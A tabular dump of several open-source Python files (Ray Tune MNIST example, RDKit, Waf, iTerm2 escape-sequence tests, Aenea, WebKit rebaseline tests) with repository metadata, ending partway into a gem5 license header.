repo_name (stringlengths 5-100) | path (stringlengths 4-375) | copies (stringclasses, 991 values) | size (stringlengths 4-7) | content (stringlengths 666-1M) | license (stringclasses, 15 values) |
---|---|---|---|---|---|
ujvl/ray-ng | python/ray/tune/examples/mnist_pytorch.py | 1 | 4582 | # Original Code here:
# https://github.com/pytorch/examples/blob/master/mnist/main.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import argparse
from filelock import FileLock
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
import ray
from ray import tune
from ray.tune import track
from ray.tune.schedulers import AsyncHyperBandScheduler
# Change these values if you want the training to run quicker or slower.
EPOCH_SIZE = 512
TEST_SIZE = 256
class ConvNet(nn.Module):
def __init__(self):
super(ConvNet, self).__init__()
self.conv1 = nn.Conv2d(1, 3, kernel_size=3)
self.fc = nn.Linear(192, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 3))
x = x.view(-1, 192)
x = self.fc(x)
return F.log_softmax(x, dim=1)
def train(model, optimizer, train_loader, device=torch.device("cpu")):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
if batch_idx * len(data) > EPOCH_SIZE:
return
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
def test(model, data_loader, device=torch.device("cpu")):
model.eval()
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (data, target) in enumerate(data_loader):
if batch_idx * len(data) > TEST_SIZE:
break
data, target = data.to(device), target.to(device)
outputs = model(data)
_, predicted = torch.max(outputs.data, 1)
total += target.size(0)
correct += (predicted == target).sum().item()
return correct / total
def get_data_loaders():
mnist_transforms = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.1307, ), (0.3081, ))])
# We add FileLock here because multiple workers will want to
# download data, and this may cause overwrites since
# DataLoader is not threadsafe.
with FileLock(os.path.expanduser("~/data.lock")):
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(
"~/data",
train=True,
download=True,
transform=mnist_transforms),
batch_size=64,
shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST("~/data", train=False, transform=mnist_transforms),
batch_size=64,
shuffle=True)
return train_loader, test_loader
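# Trainable passed to tune.run below: it loops indefinitely, reporting accuracy via
# track.log each iteration; Tune's stop criteria and scheduler decide when a trial ends.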
def train_mnist(config):
use_cuda = config.get("use_gpu") and torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
train_loader, test_loader = get_data_loaders()
model = ConvNet().to(device)
optimizer = optim.SGD(
model.parameters(), lr=config["lr"], momentum=config["momentum"])
while True:
train(model, optimizer, train_loader, device)
acc = test(model, test_loader, device)
track.log(mean_accuracy=acc)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PyTorch MNIST Example")
parser.add_argument(
"--cuda",
action="store_true",
default=False,
help="Enables GPU training")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
parser.add_argument(
"--ray-address",
help="Address of Ray cluster for seamless distributed execution.")
args = parser.parse_args()
if args.ray_address:
ray.init(address=args.ray_address)
sched = AsyncHyperBandScheduler(
time_attr="training_iteration", metric="mean_accuracy")
analysis = tune.run(
train_mnist,
name="exp",
scheduler=sched,
stop={
"mean_accuracy": 0.98,
"training_iteration": 5 if args.smoke_test else 100
},
resources_per_trial={
"cpu": 2,
"gpu": int(args.cuda)
},
num_samples=1 if args.smoke_test else 50,
config={
"lr": tune.sample_from(lambda spec: 10**(-10 * np.random.rand())),
"momentum": tune.uniform(0.1, 0.9),
"use_gpu": int(args.cuda)
})
print("Best config is:", analysis.get_best_config(metric="mean_accuracy"))
| apache-2.0 |
rdkit/rdkit-orig | rdkit/utils/REFile.py | 2 | 2195 | #
# Copyright (C) 2000 greg Landrum
#
""" contains class REFile, for working with files containing comments
"""
import re
class REFile:
"""behaves more or less like a normal file, but removes comments
Any read from the file skips lines beginning with a comment character
and cleaves off any portion of the line following a comment character
"""
def close(self):
""" closes the file
"""
self.inFile.close()
def rewind(self):
""" rewinds the file (seeks to the beginning)
"""
self.inFile.seek(0)
def readlines(self):
""" reads in all the lines of the file
"""
res = []
eofHit = 0
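# Read until EOF, stripping comment text from each line and skipping lines that
# are empty once comments are removed.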
while not eofHit:
l = self.inFile.readline()
if l == '':
eofHit = 1
else:
l = self.expr.split(l)[0]
eofHit = 0
while len(l) == 0 and not eofHit:
l = self.inFile.readline()
if l == '':
eofHit = 1
else:
l = self.expr.split(l)[0]
if not eofHit:
res.append(l)
return res
def readline(self):
""" reads in a single line from the file
"""
l = self.inFile.readline()
if l == '':
eofHit = 1
else:
l = self.expr.split(l)[0]
eofHit = 0
while len(l) == 0 and not eofHit:
l = self.inFile.readline()
if l == '':
eofHit = 1
else:
l = self.expr.split(l)[0]
return l
def __init__(self,fileName,mode='r',commentChar='#|\n'):
""" Constructor
**Arguments**
- fileName: the filename from which to read
- mode: the mode in which to open the file
- commentChar: a regexp defining the comment character
"""
self.expr = re.compile(commentChar)
self.fileName = fileName
self.mode = mode
self.inFile = open(fileName,mode)
if __name__ == '__main__':
fName = 'retest.txt'
ref = REFile(fName)
lines = ref.readlines()
print 'readlines:'
for i in xrange(len(lines)):
print '\t%d: %s'%(i,lines[i])
ref.rewind()
print 'readline:'
inStr = ref.readline()
nRead = 0
while inStr != '':
print '\t%d: %s'%(nRead,inStr)
nRead=nRead+1
inStr = ref.readline()
| bsd-3-clause |
0-wiz-0/audacity | lib-src/lv2/lv2/plugins/eg-amp.lv2/waflib/ansiterm.py | 177 | 8189 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import sys,os
try:
if not(sys.stderr.isatty()and sys.stdout.isatty()):
raise ValueError('not a tty')
from ctypes import Structure,windll,c_short,c_ushort,c_ulong,c_int,byref,POINTER,c_long,c_wchar
class COORD(Structure):
_fields_=[("X",c_short),("Y",c_short)]
class SMALL_RECT(Structure):
_fields_=[("Left",c_short),("Top",c_short),("Right",c_short),("Bottom",c_short)]
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
_fields_=[("Size",COORD),("CursorPosition",COORD),("Attributes",c_short),("Window",SMALL_RECT),("MaximumWindowSize",COORD)]
class CONSOLE_CURSOR_INFO(Structure):
_fields_=[('dwSize',c_ulong),('bVisible',c_int)]
windll.kernel32.GetStdHandle.argtypes=[c_ulong]
windll.kernel32.GetStdHandle.restype=c_ulong
windll.kernel32.GetConsoleScreenBufferInfo.argtypes=[c_ulong,POINTER(CONSOLE_SCREEN_BUFFER_INFO)]
windll.kernel32.GetConsoleScreenBufferInfo.restype=c_long
windll.kernel32.SetConsoleTextAttribute.argtypes=[c_ulong,c_ushort]
windll.kernel32.SetConsoleTextAttribute.restype=c_long
windll.kernel32.FillConsoleOutputCharacterW.argtypes=[c_ulong,c_wchar,c_ulong,POINTER(COORD),POINTER(c_ulong)]
windll.kernel32.FillConsoleOutputCharacterW.restype=c_long
windll.kernel32.FillConsoleOutputAttribute.argtypes=[c_ulong,c_ushort,c_ulong,POINTER(COORD),POINTER(c_ulong)]
windll.kernel32.FillConsoleOutputAttribute.restype=c_long
windll.kernel32.SetConsoleCursorPosition.argtypes=[c_ulong,POINTER(COORD)]
windll.kernel32.SetConsoleCursorPosition.restype=c_long
windll.kernel32.SetConsoleCursorInfo.argtypes=[c_ulong,POINTER(CONSOLE_CURSOR_INFO)]
windll.kernel32.SetConsoleCursorInfo.restype=c_long
sbinfo=CONSOLE_SCREEN_BUFFER_INFO()
csinfo=CONSOLE_CURSOR_INFO()
hconsole=windll.kernel32.GetStdHandle(-11)
windll.kernel32.GetConsoleScreenBufferInfo(hconsole,byref(sbinfo))
if sbinfo.Size.X<9 or sbinfo.Size.Y<9:raise ValueError('small console')
windll.kernel32.GetConsoleCursorInfo(hconsole,byref(csinfo))
except Exception:
pass
else:
import re,threading
is_vista=getattr(sys,"getwindowsversion",None)and sys.getwindowsversion()[0]>=6
try:
_type=unicode
except NameError:
_type=str
to_int=lambda number,default:number and int(number)or default
wlock=threading.Lock()
STD_OUTPUT_HANDLE=-11
STD_ERROR_HANDLE=-12
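# AnsiTerm emulates a subset of ANSI/VT100 escape sequences on the Windows console
# by translating them into kernel32 console API calls.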
class AnsiTerm(object):
def __init__(self):
self.encoding=sys.stdout.encoding
self.hconsole=windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
self.cursor_history=[]
self.orig_sbinfo=CONSOLE_SCREEN_BUFFER_INFO()
self.orig_csinfo=CONSOLE_CURSOR_INFO()
windll.kernel32.GetConsoleScreenBufferInfo(self.hconsole,byref(self.orig_sbinfo))
windll.kernel32.GetConsoleCursorInfo(hconsole,byref(self.orig_csinfo))
def screen_buffer_info(self):
sbinfo=CONSOLE_SCREEN_BUFFER_INFO()
windll.kernel32.GetConsoleScreenBufferInfo(self.hconsole,byref(sbinfo))
return sbinfo
def clear_line(self,param):
mode=param and int(param)or 0
sbinfo=self.screen_buffer_info()
if mode==1:
line_start=COORD(0,sbinfo.CursorPosition.Y)
line_length=sbinfo.Size.X
elif mode==2:
line_start=COORD(sbinfo.CursorPosition.X,sbinfo.CursorPosition.Y)
line_length=sbinfo.Size.X-sbinfo.CursorPosition.X
else:
line_start=sbinfo.CursorPosition
line_length=sbinfo.Size.X-sbinfo.CursorPosition.X
chars_written=c_ulong()
windll.kernel32.FillConsoleOutputCharacterW(self.hconsole,c_wchar(' '),line_length,line_start,byref(chars_written))
windll.kernel32.FillConsoleOutputAttribute(self.hconsole,sbinfo.Attributes,line_length,line_start,byref(chars_written))
def clear_screen(self,param):
mode=to_int(param,0)
sbinfo=self.screen_buffer_info()
if mode==1:
clear_start=COORD(0,0)
clear_length=sbinfo.CursorPosition.X*sbinfo.CursorPosition.Y
elif mode==2:
clear_start=COORD(0,0)
clear_length=sbinfo.Size.X*sbinfo.Size.Y
windll.kernel32.SetConsoleCursorPosition(self.hconsole,clear_start)
else:
clear_start=sbinfo.CursorPosition
clear_length=((sbinfo.Size.X-sbinfo.CursorPosition.X)+sbinfo.Size.X*(sbinfo.Size.Y-sbinfo.CursorPosition.Y))
chars_written=c_ulong()
windll.kernel32.FillConsoleOutputCharacterW(self.hconsole,c_wchar(' '),clear_length,clear_start,byref(chars_written))
windll.kernel32.FillConsoleOutputAttribute(self.hconsole,sbinfo.Attributes,clear_length,clear_start,byref(chars_written))
def push_cursor(self,param):
sbinfo=self.screen_buffer_info()
self.cursor_history.append(sbinfo.CursorPosition)
def pop_cursor(self,param):
if self.cursor_history:
old_pos=self.cursor_history.pop()
windll.kernel32.SetConsoleCursorPosition(self.hconsole,old_pos)
def set_cursor(self,param):
y,sep,x=param.partition(';')
x=to_int(x,1)-1
y=to_int(y,1)-1
sbinfo=self.screen_buffer_info()
new_pos=COORD(min(max(0,x),sbinfo.Size.X),min(max(0,y),sbinfo.Size.Y))
windll.kernel32.SetConsoleCursorPosition(self.hconsole,new_pos)
def set_column(self,param):
x=to_int(param,1)-1
sbinfo=self.screen_buffer_info()
new_pos=COORD(min(max(0,x),sbinfo.Size.X),sbinfo.CursorPosition.Y)
windll.kernel32.SetConsoleCursorPosition(self.hconsole,new_pos)
def move_cursor(self,x_offset=0,y_offset=0):
sbinfo=self.screen_buffer_info()
new_pos=COORD(min(max(0,sbinfo.CursorPosition.X+x_offset),sbinfo.Size.X),min(max(0,sbinfo.CursorPosition.Y+y_offset),sbinfo.Size.Y))
windll.kernel32.SetConsoleCursorPosition(self.hconsole,new_pos)
def move_up(self,param):
self.move_cursor(y_offset=-to_int(param,1))
def move_down(self,param):
self.move_cursor(y_offset=to_int(param,1))
def move_left(self,param):
self.move_cursor(x_offset=-to_int(param,1))
def move_right(self,param):
self.move_cursor(x_offset=to_int(param,1))
def next_line(self,param):
sbinfo=self.screen_buffer_info()
self.move_cursor(x_offset=-sbinfo.CursorPosition.X,y_offset=to_int(param,1))
def prev_line(self,param):
sbinfo=self.screen_buffer_info()
self.move_cursor(x_offset=-sbinfo.CursorPosition.X,y_offset=-to_int(param,1))
def rgb2bgr(self,c):
return((c&1)<<2)|(c&2)|((c&4)>>2)
def set_color(self,param):
cols=param.split(';')
sbinfo=CONSOLE_SCREEN_BUFFER_INFO()
windll.kernel32.GetConsoleScreenBufferInfo(self.hconsole,byref(sbinfo))
attr=sbinfo.Attributes
for c in cols:
if is_vista:
c=int(c)
else:
c=to_int(c,0)
if 29<c<38:
attr=(attr&0xfff0)|self.rgb2bgr(c-30)
elif 39<c<48:
attr=(attr&0xff0f)|(self.rgb2bgr(c-40)<<4)
elif c==0:
attr=self.orig_sbinfo.Attributes
elif c==1:
attr|=0x08
elif c==4:
attr|=0x80
elif c==7:
attr=(attr&0xff88)|((attr&0x70)>>4)|((attr&0x07)<<4)
windll.kernel32.SetConsoleTextAttribute(self.hconsole,attr)
def show_cursor(self,param):
csinfo.bVisible=1
windll.kernel32.SetConsoleCursorInfo(self.hconsole,byref(csinfo))
def hide_cursor(self,param):
csinfo.bVisible=0
windll.kernel32.SetConsoleCursorInfo(self.hconsole,byref(csinfo))
ansi_command_table={'A':move_up,'B':move_down,'C':move_right,'D':move_left,'E':next_line,'F':prev_line,'G':set_column,'H':set_cursor,'f':set_cursor,'J':clear_screen,'K':clear_line,'h':show_cursor,'l':hide_cursor,'m':set_color,'s':push_cursor,'u':pop_cursor,}
ansi_tokens=re.compile('(?:\x1b\[([0-9?;]*)([a-zA-Z])|([^\x1b]+))')
def write(self,text):
try:
wlock.acquire()
for param,cmd,txt in self.ansi_tokens.findall(text):
if cmd:
cmd_func=self.ansi_command_table.get(cmd)
if cmd_func:
cmd_func(self,param)
else:
self.writeconsole(txt)
finally:
wlock.release()
def writeconsole(self,txt):
chars_written=c_int()
writeconsole=windll.kernel32.WriteConsoleA
if isinstance(txt,_type):
writeconsole=windll.kernel32.WriteConsoleW
TINY_STEP=3000
for x in range(0,len(txt),TINY_STEP):
tiny=txt[x:x+TINY_STEP]
writeconsole(self.hconsole,tiny,len(tiny),byref(chars_written),None)
def flush(self):
pass
def isatty(self):
return True
sys.stderr=sys.stdout=AnsiTerm()
os.environ['TERM']='vt100'
| gpl-2.0 |
splodingsocks/iTerm2 | tests/esctest/tests/ris.py | 28 | 2812 | from esc import ESC, NUL, TAB
import esccmd
import escio
import esclog
from escutil import AssertEQ, AssertScreenCharsInRectEqual, AssertTrue, GetCursorPosition, GetScreenSize, GetIconTitle, GetWindowTitle, knownBug, vtLevel
from esctypes import InternalError, Point, Rect
class RISTests(object):
def test_RIS_ClearsScreen(self):
escio.Write("x")
esccmd.RIS()
AssertScreenCharsInRectEqual(Rect(1, 1, 1, 1), [ NUL ])
def test_RIS_CursorToOrigin(self):
esccmd.CUP(Point(5, 6))
esccmd.RIS()
AssertEQ(GetCursorPosition(), Point(1, 1))
def test_RIS_ResetTabs(self):
esccmd.HTS()
esccmd.CUF()
esccmd.HTS()
esccmd.CUF()
esccmd.HTS()
esccmd.RIS()
escio.Write(TAB)
AssertEQ(GetCursorPosition(), Point(9, 1))
@knownBug(terminal="iTerm2", reason="RM_Title and SM_Title not implemented.")
def test_RIS_ResetTitleMode(self):
esccmd.RM_Title(esccmd.SET_UTF8, esccmd.QUERY_UTF8)
esccmd.SM_Title(esccmd.SET_HEX, esccmd.QUERY_HEX)
esccmd.RIS()
esccmd.ChangeWindowTitle("ab")
AssertEQ(GetWindowTitle(), "ab")
esccmd.ChangeWindowTitle("a")
AssertEQ(GetWindowTitle(), "a")
esccmd.ChangeIconTitle("ab")
AssertEQ(GetIconTitle(), "ab")
esccmd.ChangeIconTitle("a")
AssertEQ(GetIconTitle(), "a")
@knownBug(terminal="iTerm2", reason="iTerm2 doesn't support ALTBUF.")
def test_RIS_ExitAltScreen(self):
escio.Write("m")
esccmd.DECSET(esccmd.ALTBUF)
esccmd.CUP(Point(1, 1))
escio.Write("a")
esccmd.RIS()
AssertScreenCharsInRectEqual(Rect(1, 1, 1, 1), [ NUL ])
esccmd.DECSET(esccmd.ALTBUF)
AssertScreenCharsInRectEqual(Rect(1, 1, 1, 1), [ "a" ])
@knownBug(terminal="xterm",
reason="xterm seems to check initflags rather than flags in ReallyReset() (bug reported)")
def test_RIS_ResetDECCOLM(self):
esccmd.DECSET(esccmd.Allow80To132)
esccmd.DECSET(esccmd.DECCOLM)
AssertEQ(GetScreenSize().width(), 132)
esccmd.RIS()
AssertEQ(GetScreenSize().width(), 80)
def test_RIS_ResetDECOM(self):
esccmd.DECSTBM(5, 7)
esccmd.DECSET(esccmd.DECLRMM)
esccmd.DECSLRM(5, 7)
esccmd.DECSET(esccmd.DECOM)
esccmd.RIS()
esccmd.CUP(Point(1, 1))
escio.Write("X")
esccmd.DECRESET(esccmd.DECLRMM)
esccmd.DECSTBM()
AssertScreenCharsInRectEqual(Rect(1, 1, 1, 1), [ "X" ])
def test_RIS_RemoveMargins(self):
esccmd.DECSET(esccmd.DECLRMM)
esccmd.DECSLRM(3, 5)
esccmd.DECSTBM(4, 6)
esccmd.RIS()
esccmd.CUP(Point(3, 4))
esccmd.CUB()
AssertEQ(GetCursorPosition(), Point(2, 4))
esccmd.CUU()
AssertEQ(GetCursorPosition(), Point(2, 3))
esccmd.CUP(Point(5, 6))
esccmd.CUF()
AssertEQ(GetCursorPosition(), Point(6, 6))
esccmd.CUD()
AssertEQ(GetCursorPosition(), Point(6, 7))
| gpl-2.0 |
djr7C4/aenea | client/_aenea.py | 6 | 5546 | # This is a command module for Dragonfly. It provides support for several of
# Aenea's built-in capabilities. This module is NOT required for Aenea to
# work correctly, but it is strongly recommended.
# This file is part of Aenea
#
# Aenea is free software: you can redistribute it and/or modify it under
# the terms of version 3 of the GNU Lesser General Public License as
# published by the Free Software Foundation.
#
# Aenea is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with Aenea. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright (2014) Alex Roper
# Alex Roper <[email protected]>
import os
import sys
import dragonfly
# Internal NatLink module for reloading grammars.
import natlinkmain
try:
import aenea
import aenea.proxy_contexts
import aenea.configuration
import aenea.communications
import aenea.config
import aenea.configuration
except ImportError:
print 'Unable to import Aenea client-side modules.'
raise
print 'Aenea client-side modules loaded successfully'
print 'Settings:'
print '\tHOST:', aenea.config.DEFAULT_SERVER_ADDRESS[0]
print '\tPORT:', aenea.config.DEFAULT_SERVER_ADDRESS[1]
print '\tPLATFORM:', aenea.config.PLATFORM
print '\tUSE_MULTIPLE_ACTIONS:', aenea.config.USE_MULTIPLE_ACTIONS
print '\tSCREEN_RESOLUTION:', aenea.config.SCREEN_RESOLUTION
try:
aenea.proxy_contexts._get_context()
print 'Aenea: Successfully connected to server.'
except:
print 'Aenea: Unable to connect to server.'
# Commands that can be rebound.
command_table = [
'set proxy server to <proxy>',
'disable proxy server',
'enable proxy server',
'force natlink to reload all grammars'
]
command_table = aenea.configuration.make_grammar_commands(
'aenea',
dict(zip(command_table, command_table))
)
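# Map a compiled .pyc path back to its corresponding .py source path.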
def topy(path):
if path.endswith(".pyc"):
return path[:-1]
return path
class DisableRule(dragonfly.CompoundRule):
spec = command_table['disable proxy server']
def _process_recognition(self, node, extras):
aenea.config.disable_proxy()
class EnableRule(dragonfly.CompoundRule):
spec = command_table['enable proxy server']
def _process_recognition(self, node, extras):
aenea.config.enable_proxy()
def reload_code():
# Do not reload anything in these directories or their subdirectories.
dir_reload_blacklist = set(["core"])
macro_dir = "C:\\NatLink\\NatLink\\MacroSystem"
# Unload all grammars.
natlinkmain.unloadEverything()
# Unload all modules in macro_dir except for those in directories on the
# blacklist.
# Consider them in sorted order to try to make things as predictable as possible to ease debugging.
for name, module in sorted(sys.modules.items()):
if module and hasattr(module, "__file__"):
# Some builtin modules only have a name so module is None or
# do not have a __file__ attribute. We skip these.
path = module.__file__
# Convert .pyc paths to .py paths.
path = topy(path)
# Do not unimport this module! This will cause major problems!
if (path.startswith(macro_dir) and
not bool(set(path.split(os.path.sep)) & dir_reload_blacklist)
and path != topy(os.path.abspath(__file__))):
print "removing %s from cache" % name
# Remove the module from the cache so that it will be reloaded
# the next time # that it is imported. The paths for packages
# end with __init__.pyc so this # takes care of them as well.
del sys.modules[name]
try:
# Reload the top-level modules in macro_dir.
natlinkmain.findAndLoadFiles()
except Exception as e:
print "reloading failed: {}".format(e)
else:
print "finished reloading"
# Note that you do not need to turn mic off and then on after saying this. This
# also unloads all modules and packages in the macro directory so that they will
# be reloaded the next time that they are imported. It even reloads Aenea!
class ReloadGrammarsRule(dragonfly.MappingRule):
mapping = {command_table['force natlink to reload all grammars']: dragonfly.Function(reload_code)}
server_list = dragonfly.DictList('aenea servers')
server_list_watcher = aenea.configuration.ConfigWatcher(
('grammar_config', 'aenea'))
class ChangeServer(dragonfly.CompoundRule):
spec = command_table['set proxy server to <proxy>']
extras = [dragonfly.DictListRef('proxy', server_list)]
def _process_recognition(self, node, extras):
aenea.communications.set_server_address((extras['proxy']['host'], extras['proxy']['port']))
def _process_begin(self):
if server_list_watcher.refresh():
server_list.clear()
for k, v in server_list_watcher.conf.get('servers', {}).iteritems():
server_list[str(k)] = v
grammar = dragonfly.Grammar('aenea')
grammar.add_rule(EnableRule())
grammar.add_rule(DisableRule())
grammar.add_rule(ReloadGrammarsRule())
grammar.add_rule(ChangeServer())
grammar.load()
# Unload function which will be called at unload time.
def unload():
global grammar
if grammar:
grammar.unload()
grammar = None
| lgpl-3.0 |
sloanyang/android_external_webkit | Tools/Scripts/webkitpy/tool/commands/rebaselineserver_unittest.py | 15 | 11435 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitpy.common.system import filesystem_mock
from webkitpy.layout_tests.port import base
from webkitpy.layout_tests.port.webkit import WebKitPort
from webkitpy.tool.commands import rebaselineserver
from webkitpy.tool.mocktool import MockSCM
class RebaselineTestTest(unittest.TestCase):
def test_text_rebaseline_update(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/mac/fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='none',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_new(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='none',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_move_no_op_1(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/win/fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_move_no_op_2(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/mac/fast/text-expected.checksum',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Moving current mac baselines to mac-leopard',
' No current baselines to move',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_move(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/mac/fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Moving current mac baselines to mac-leopard',
' Moved text-expected.txt',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_move_only_images(self):
self._assertRebaseline(
test_files=(
'fast/image-expected.txt',
'platform/mac/fast/image-expected.txt',
'platform/mac/fast/image-expected.png',
'platform/mac/fast/image-expected.checksum',
),
results_files=(
'fast/image-actual.png',
'fast/image-actual.checksum',
),
test_name='fast/image.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=True,
expected_log=[
'Rebaselining fast/image...',
' Moving current mac baselines to mac-leopard',
' Moved image-expected.checksum',
' Moved image-expected.png',
' Updating baselines for mac',
' Updated image-expected.checksum',
' Updated image-expected.png',
])
def test_text_rebaseline_move_already_exist(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/mac-leopard/fast/text-expected.txt',
'platform/mac/fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=False,
expected_log=[
'Rebaselining fast/text...',
' Moving current mac baselines to mac-leopard',
' Already had baselines in mac-leopard, could not move existing mac ones',
])
def test_image_rebaseline(self):
self._assertRebaseline(
test_files=(
'fast/image-expected.txt',
'platform/mac/fast/image-expected.png',
'platform/mac/fast/image-expected.checksum',
),
results_files=(
'fast/image-actual.png',
'fast/image-actual.checksum',
),
test_name='fast/image.html',
baseline_target='mac',
baseline_move_to='none',
expected_success=True,
expected_log=[
'Rebaselining fast/image...',
' Updating baselines for mac',
' Updated image-expected.checksum',
' Updated image-expected.png',
])
def _assertRebaseline(self, test_files, results_files, test_name, baseline_target, baseline_move_to, expected_success, expected_log):
log = []
test_config = get_test_config(test_files, results_files)
success = rebaselineserver._rebaseline_test(
test_name,
baseline_target,
baseline_move_to,
test_config,
log=lambda l: log.append(l))
self.assertEqual(expected_log, log)
self.assertEqual(expected_success, success)
class GetActualResultFilesTest(unittest.TestCase):
def test(self):
test_config = get_test_config(result_files=(
'fast/text-actual.txt',
'fast2/text-actual.txt',
'fast/text2-actual.txt',
'fast/text-notactual.txt',
))
self.assertEqual(
('text-actual.txt',),
rebaselineserver._get_actual_result_files(
'fast/text.html', test_config))
class GetBaselinesTest(unittest.TestCase):
def test_no_baselines(self):
self._assertBaselines(
test_files=(),
test_name='fast/missing.html',
expected_baselines={})
def test_text_baselines(self):
self._assertBaselines(
test_files=(
'fast/text-expected.txt',
'platform/mac/fast/text-expected.txt',
),
test_name='fast/text.html',
expected_baselines={
'mac': {'.txt': True},
'base': {'.txt': False},
})
def test_image_and_text_baselines(self):
self._assertBaselines(
test_files=(
'fast/image-expected.txt',
'platform/mac/fast/image-expected.png',
'platform/mac/fast/image-expected.checksum',
'platform/win/fast/image-expected.png',
'platform/win/fast/image-expected.checksum',
),
test_name='fast/image.html',
expected_baselines={
'base': {'.txt': True},
'mac': {'.checksum': True, '.png': True},
'win': {'.checksum': False, '.png': False},
})
def test_extra_baselines(self):
self._assertBaselines(
test_files=(
'fast/text-expected.txt',
'platform/nosuchplatform/fast/text-expected.txt',
),
test_name='fast/text.html',
expected_baselines={'base': {'.txt': True}})
def _assertBaselines(self, test_files, test_name, expected_baselines):
actual_baselines = rebaselineserver._get_test_baselines(
test_name, get_test_config(test_files))
self.assertEqual(expected_baselines, actual_baselines)
def get_test_config(test_files=[], result_files=[]):
layout_tests_directory = base.Port().layout_tests_dir()
results_directory = '/WebKitBuild/Debug/layout-test-results'
mock_filesystem = filesystem_mock.MockFileSystem()
for file in test_files:
file_path = mock_filesystem.join(layout_tests_directory, file)
mock_filesystem.files[file_path] = ''
for file in result_files:
file_path = mock_filesystem.join(results_directory, file)
mock_filesystem.files[file_path] = ''
class TestMacPort(WebKitPort):
def __init__(self):
WebKitPort.__init__(self, filesystem=mock_filesystem)
self._name = 'mac'
return rebaselineserver.TestConfig(
TestMacPort(),
layout_tests_directory,
results_directory,
('mac', 'mac-leopard', 'win', 'linux'),
mock_filesystem,
MockSCM())
| gpl-2.0 |
LingxiaoJIA/gem5 | src/cpu/o3/FUPool.py | 69 | 2002 | # Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
